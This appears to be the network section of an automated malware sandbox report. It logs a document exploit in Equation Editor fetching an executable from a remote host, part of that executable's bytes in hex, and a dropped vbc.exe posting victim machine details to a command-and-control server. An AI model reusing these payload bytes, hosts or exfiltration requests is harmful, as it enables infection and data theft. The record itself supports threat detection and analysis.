Jun 16, 2021 12:29:48.546235085 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.549201012 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.555502892 CEST	80	49168	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.557100058 CEST	49168	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.673989058 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.835107088 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:48.835292101 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:48.840133905 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.000763893 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.000900030 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.160271883 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679653883 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679689884 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679703951 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679722071 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679752111 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679773092 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679797888 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.679816008 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.683105946 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.683183908 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.683193922 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.689352989 CEST	80	49169	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.689584017 CEST	49169	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.818739891 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.981076002 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:49.981179953 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:49.987019062 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.149313927 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.149492025 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.314294100 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833703995 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833746910 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833812952 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833843946 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833856106 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.833889961 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833903074 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.833934069 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.833990097 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.834017992 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.834050894 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.834070921 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.834076881 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.834089994 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.843909979 CEST	80	49170	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:50.844044924 CEST	49170	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:50.983355045 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.145850897 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.146024942 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.153026104 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.315207958 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.315301895 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.477842093 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.991955042 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992002964 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992021084 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992053032 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992058039 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.992069960 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992090940 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.992090940 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992120981 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992129087 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:51.992136955 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:51.992171049 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:52.007225037 CEST	80	49171	63.141.228.141	192.168.2.22
Jun 16, 2021 12:29:52.007287979 CEST	49171	80	192.168.2.22	63.141.228.141
Jun 16, 2021 12:29:54.436877012 CEST	49171	80	192.168.2.22	63.141.228.141

HTTP Request Dependency Graph

103.89.90.94

63.141.228.141

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49167	103.89.90.94	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2021 12:29:39.017275095 CEST	0	OUT	GET /pzldoc/regasm.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: 103.89.90.94 Connection: Keep-Alive
Jun 16, 2021 12:29:39.263397932 CEST	1	IN	HTTP/1.1 200 OK Date: Wed, 16 Jun 2021 10:29:38 GMT Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28 Last-Modified: Wed, 16 Jun 2021 00:49:42 GMT ETag: "ba000-5c4d77753dec3" Accept-Ranges: bytes Content-Length: 761856 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 9c 4a c9 60 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 94 0b 00 00 0a 00 00 00 00 00 00 de b2 0b 00 00 20 00 00 00 c0 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 b2 0b 00 4b 00 00 00 00 c0 0b 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0b 00 0c 00 00 00 3f b2 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 92 0b 00 00 20 00 00 00 94 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 06 00 00 00 c0 0b 00 00 08 00 00 00 96 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 0b 00 00 02 00 00 00 9e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 b2 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 26 01 00 68 05 01 00 03 00 00 00 01 00 00 06 50 2c 02 00 ef 85 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 2b 02 26 16 28 0e 00 00 0a 28 0f 00 00 0a 28 13 00 00 06 02 6f 10 00 00 0a 2a 00 13 30 03 00 bb 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 03 00 00 00 16 39 53 00 00 00 26 02 16 28 11 00 00 0a 38 0b 00 00 00 26 20 01 00 00 00 38 3b 00 00 00 02 16 28 0a 00 00 06 20 07 00 00 00 38 2a 00 00 00 02 16 28 07 00 00 06 20 06 00 00 00 38 19 00 00 00 02 16 28 09 00 00 06 38 bb ff ff ff 20 03 00 00 00 fe 0e 00 00 fe 0c 00 00 45 08 00 00 00 c2 ff ff ff a0 ff ff ff c2 ff ff ff b1 ff ff ff 90 ff ff ff 89 ff ff ff 10 00 00 00 2f 00 00 00 20 05 00 00 00 28 05 00 00 06 3a cc ff ff ff 26 02 16 28 08 00 00 06 16 28 05 00 00 06 39 73 ff ff ff 26 20 00 00 00 00 16 39 ad ff ff ff 26 2a 00 56 2b 02 26 16 02 28 0b 00 00 06 28 0c 00 00 06 28 0d 00 00 06 2a 00 00 56 2b 02 26 16 02 28 0b 00 00 06 6f 23 00 00 06 28 0e 00 00 06 2a 00 00 1a 2b 02 26 16 17 2a 00 1a 2b 02 26 16 16 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 12 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 13 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 15 00 00 0a 2a 00 2e 2b 02 26 16 00 28 15 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 6f 21 00 00 06 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 16 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJ` @ @K,? H.text `.rsrc,@@.reloc@BH&hP,j+&(((o0+&+& 9S&(8& 8;( 8( 8(8 E/ (:&((9s& 9&V+&(((V+&(o#(+&+&J+&(J+&(J+&(J+&(.+&(:+&o!*J+&(
Jun 16, 2021 12:29:39.263458967 CEST	3	IN	Data Raw: 00 0a 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 28 17 00 00 0a 2a 00 3e 2b 02 26 16 2b 02 26 16 02 28 10 00 00 06 2a 3a 2b 02 26 16 fe 09 00 00 28 18 00 00 0a 2a 00 13 30 03 00 cc 00 00 00 01 00 00 11 2b 02 26 16 2b 02 26 16 20 05 00 00 00 28 Data Ascii: J+&(>+&+&(:+&(0+&+& (:8zs(:& 9Y&s 8Ds 80s 8s82 E
Jun 16, 2021 12:29:39.263478041 CEST	4	IN	Data Raw: 02 26 16 02 72 73 01 00 70 28 76 00 00 06 28 40 00 00 0a 2a 00 00 5a 2b 02 26 16 02 72 73 01 00 70 03 8c 04 00 00 01 28 78 00 00 06 2a 00 56 2b 02 26 16 02 72 93 01 00 70 28 76 00 00 06 28 77 00 00 06 2a 00 00 46 2b 02 26 16 02 72 93 01 00 70 03 Data Ascii: &rsp(v(@Z+&rsp(xV+&rp(v(wF+&rp(xV+&rp(v(yZ+&rp4oA0&+&rp(v%:&55Z+&rp5(x*0&+&rp(v%:
Jun 16, 2021 12:29:39.263520002 CEST	5	IN	Data Raw: 28 85 00 00 06 39 2d 00 00 00 26 20 01 00 00 00 28 86 00 00 06 39 97 ff ff ff 26 73 4d 00 00 0a 0a 20 04 00 00 00 38 86 ff ff ff 06 08 28 92 00 00 06 38 33 ff ff ff 26 20 00 00 00 00 38 6f ff ff ff 06 28 94 00 00 06 03 16 03 8e 69 28 95 00 00 06 Data Ascii: (9-& (9&sM 8(83& 8o(i(+&+&.+&(N.+&(DJ+&oO>+&(PJ+&oQ.+&(~.+&(.+&(RJ+&oSJ+&
Jun 16, 2021 12:29:39.508369923 CEST	7	IN	Data Raw: 00 00 00 08 07 3e 93 ff ff ff 20 01 00 00 00 17 3a 39 00 00 00 26 06 72 55 03 00 70 28 a7 00 00 06 0a 20 09 00 00 00 38 22 00 00 00 08 02 7b 16 00 00 04 8e 69 17 da 3b 6e 00 00 00 38 d5 ff ff ff 20 00 00 00 00 fe 0e 08 00 fe 0c 08 00 45 0c 00 00 Data Ascii: > :9&rUp( 8"{i;n8 Edt/?t'7 8((( 8 :&{og 8i((9& 8
Jun 16, 2021 12:29:39.508416891 CEST	8	IN	Data Raw: 20 08 00 00 00 38 d0 00 00 00 02 28 e0 00 00 06 02 6f b6 00 00 06 28 e1 00 00 06 20 0f 00 00 00 38 b5 00 00 00 02 28 e7 00 00 06 20 12 00 00 00 38 a5 00 00 00 02 28 e0 00 00 06 02 28 dc 00 00 06 28 e1 00 00 06 20 0a 00 00 00 38 8a 00 00 00 02 16 Data Ascii: 8(o( 8( 8((( 8( (:t&(( 9Z&((ov 8>((( 8#(((8^ Ex]`%
Jun 16, 2021 12:29:39.508446932 CEST	10	IN	Data Raw: 02 26 16 02 03 7d 1e 00 00 04 2a 00 00 00 2e 2b 02 26 16 02 7b 1f 00 00 04 2a 13 30 03 00 f6 00 00 00 0f 00 00 11 2b 02 26 16 20 03 00 00 00 38 63 00 00 00 07 06 28 e9 00 00 06 20 00 00 00 00 38 52 00 00 00 02 7b 1f 00 00 04 0b 38 a4 00 00 00 26 Data Ascii: &}.+&{0+& 8c( 8R{8& 8;( 8*{ 8}8 E}=l-}S 8s(:g& 8
Jun 16, 2021 12:29:39.508479118 CEST	11	IN	Data Raw: 00 6f b6 00 00 06 2a 00 3a 2b 02 26 16 fe 09 00 00 6f b8 00 00 06 2a 00 3a 2b 02 26 16 fe 09 00 00 6f ba 00 00 06 2a 00 3a 2b 02 26 16 fe 09 00 00 6f bc 00 00 06 2a 00 4a 2b 02 26 16 fe 09 00 00 fe 09 01 00 6f 87 00 00 0a 2a 00 3a 2b 02 26 16 fe Data Ascii: o:+&o:+&o:+&oJ+&o:+&oJ+&(J+&(J+&(:+&(wJ+&ov:+&oJ+&(J+&(
Jun 16, 2021 12:29:39.508508921 CEST	12	IN	Data Raw: 00 00 0a 02 28 36 01 00 06 72 bd 05 00 70 28 3a 01 00 06 02 28 36 01 00 06 16 28 3d 01 00 06 25 02 28 3e 01 00 06 72 df 05 00 70 28 39 01 00 06 02 28 3e 01 00 06 72 df 05 00 70 28 3a 01 00 06 25 02 6f 01 01 00 06 72 03 06 00 70 28 39 01 00 06 02 Data Ascii: (6rp(:(6(=%(>rp(9(>rp(:%orp(9(?rp(:%(@r+p(9(@r+p(:%(ArKp(9(ArKp(:%(Brkp(9orkp(:%orp(9orp(:%(Crp(9
Jun 16, 2021 12:29:39.508539915 CEST	14	IN	Data Raw: 20 06 00 00 00 38 91 ff ff ff 02 7b 25 00 00 04 0b 20 04 00 00 00 38 80 ff ff ff 2a 2e 2b 02 26 16 02 7b 26 00 00 04 2a 32 2b 02 26 16 02 03 7d 26 00 00 04 2a 00 00 00 2e 2b 02 26 16 02 7b 27 00 00 04 2a 32 2b 02 26 16 02 03 7d 27 00 00 04 2a 00 Data Ascii: 8{% 8.+&{&2+&}&.+&{'2+&}'.+&{(2+&}(.+&{)2+&}).+&{2+&}.+&{+2+&}+.+&{,2+&},.+&{-2+&
Jun 16, 2021 12:29:39.508569002 CEST	15	IN	Data Raw: 28 42 01 00 06 06 11 05 9a 28 62 01 00 06 20 09 00 00 00 38 97 01 00 00 02 28 41 01 00 06 06 08 9a 28 62 01 00 06 38 5a ff ff ff 26 20 08 00 00 00 17 3a 78 01 00 00 26 02 28 36 01 00 06 06 07 9a 28 66 01 00 06 28 67 01 00 06 20 13 00 00 00 28 23 Data Ascii: (B(b 8(A(b8Z& :x&(6(f(g (#:U&(?(c(drep(e(b :$&(`(_{:{rp(+ 8((_{:{rp(+ 8((_{:{

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49168	63.141.228.141	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Jun 16, 2021 12:29:47.751147985 CEST	807	OUT	POST /32.php/S4wFP8QBww9Tp HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 63.141.228.141 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B78A3212 Content-Length: 176 Connection: close
Jun 16, 2021 12:29:47.911638975 CEST	807	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 33 00 30 00 30 00 32 00 31 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.ruAlbus830021ALBUS-PCk0DE4229FCF97F5879F50F8FD3RiKdK
Jun 16, 2021 12:29:48.545754910 CEST	808	IN	HTTP/1.1 404 Not Found Date: Wed, 16 Jun 2021 10:29:47 GMT Server: Apache Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
Jun 16, 2021 12:29:48.545856953 CEST	810	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
Jun 16, 2021 12:29:48.545919895 CEST	811	IN	Data Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
Jun 16, 2021 12:29:48.545985937 CEST	813	IN	Data Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20 Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
Jun 16, 2021 12:29:48.546049118 CEST	814	IN	Data Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
Jun 16, 2021 12:29:48.546111107 CEST	815	IN	Data Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72 Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
Jun 16, 2021 12:29:48.546174049 CEST	817	IN	Data Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54 Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
